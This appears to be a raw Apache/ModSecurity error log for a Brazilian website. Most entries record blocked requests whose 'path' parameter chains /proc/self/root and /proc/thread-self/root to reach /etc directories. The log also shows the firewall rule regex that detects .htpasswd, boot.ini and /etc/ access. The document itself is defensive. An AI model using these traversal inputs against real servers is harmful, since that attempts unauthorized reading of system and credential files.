[Thu Mar 19 11:05:45.505428 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:51518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwCuOyqAr6etmhZHNpiPgAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:05:53.121817 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35810] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:05:57.329351 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.243.128:51528] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwCxRkFeYa1D6dYQnDxxgAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:06:00.723012 2026] [:error] [pid 27403:tid 140411699963648] [client 74.7.244.43:55374] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwCyBkFeYa1D6dYQnDxywAAAcU"]
[Thu Mar 19 11:06:15.067884 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:36330] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:06:15.896844 2026] [mime_magic:error] [pid 26799:tid 140411548894976] (70014)End of file found: [client 57.141.18.36:37980] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:06:28.293822 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.241.31:43652] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwC5AkwaGbbGflqUZDC9AAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:06:28.294252 2026] [mime_magic:error] [pid 17887:tid 140411632822016] (70014)End of file found: [client 74.7.241.31:43652] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:06:36.008794 2026] [mime_magic:error] [pid 14269:tid 140411733534464] (70014)End of file found: [client 57.141.18.54:38630] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:06:37.189923 2026] [proxy_fcgi:error] [pid 30077:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36736] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:06:45.870122 2026] [mime_magic:error] [pid 30077:tid 140411641214720] (70014)End of file found: [client 74.7.241.31:38430] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/lib/udev/hwdb.d
[Thu Mar 19 11:06:49.137996 2026] [mime_magic:error] [pid 17653:tid 140411708356352] (70014)End of file found: [client 57.141.18.99:39048] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:06:51.193108 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.241.31:33784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwC-8df6f5d65gmYZR4qgAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:07:01.121962 2026] [proxy_fcgi:error] [pid 30077:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37312] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:07:10.746651 2026] [core:alert] [pid 14269:tid 140411557287680] [client 57.141.18.111:39466] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 11:07:20.603754 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:40942] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwDGNa6ubjKNq_cu4ZVaQAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:07:24.034352 2026] [proxy_fcgi:error] [pid 27293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:37854] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:07:26.341062 2026] [:error] [pid 27403:tid 140411548894976] [client 74.7.243.128:40576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwDHhkFeYa1D6dYQnDyCQAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:07:32.741108 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.243.128:40584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwDJP-YZRR_7pZ7nDKNdgAAA8Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:07:34.532228 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:44380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwDJvu8EFLIOrSqIpuoHwAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:07:38.640713 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:44388] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwDKuyqAr6etmhZHNpiegAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:07:49.121833 2026] [proxy_fcgi:error] [pid 14269:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38432] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:07:50.979278 2026] [:error] [pid 27293:tid 140411574073088] [client 74.7.243.128:40564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwDNv-YZRR_7pZ7nDKNgAAAA9Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:08:09.061027 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:54428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwDSda6ubjKNq_cu4ZVngAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:08:16.038889 2026] [proxy_fcgi:error] [pid 17887:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39040] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:08:19.833285 2026] [:error] [pid 19093:tid 140411699963648] [client 74.7.243.128:53664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwDU1_V7PWP6ixUYl6-TQAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:08:47.129802 2026] [proxy_fcgi:error] [pid 27293:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:39728] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:09:07.597465 2026] [:error] [pid 27403:tid 140411574073088] [client 74.7.243.128:47538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwDgxkFeYa1D6dYQnDyWgAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:09:11.249320 2026] [:error] [pid 27293:tid 140411683178240] [client 74.7.243.128:36770] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwDhv-YZRR_7pZ7nDKNmgAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:09:16.451602 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:36772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwDjOyqAr6etmhZHNpipAAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:09:18.105817 2026] [proxy_fcgi:error] [pid 19093:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:40396] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:09:24.579256 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.228.61:52108] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwDlOyqAr6etmhZHNpiqgAAAEA"]
[Thu Mar 19 11:09:30.388090 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:55872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwDmuyqAr6etmhZHNpisAAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:09:51.125784 2026] [proxy_fcgi:error] [pid 27403:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41110] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:10:17.130931 2026] [proxy_fcgi:error] [pid 19093:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:41588] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:10:41.129895 2026] [proxy_fcgi:error] [pid 14269:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:42120] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:10:46.823213 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:41372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwD5ta6ubjKNq_cu4ZWCwAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:11:04.201475 2026] [:error] [pid 19093:tid 140411691570944] [client 74.7.244.43:57572] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwD-F_V7PWP6ixUYl6-lwAAAoY"]
[Thu Mar 19 11:11:07.065855 2026] [proxy_fcgi:error] [pid 17653:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:42820] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:11:18.476583 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.243.128:44226] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwEBv-YZRR_7pZ7nDKOAgAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
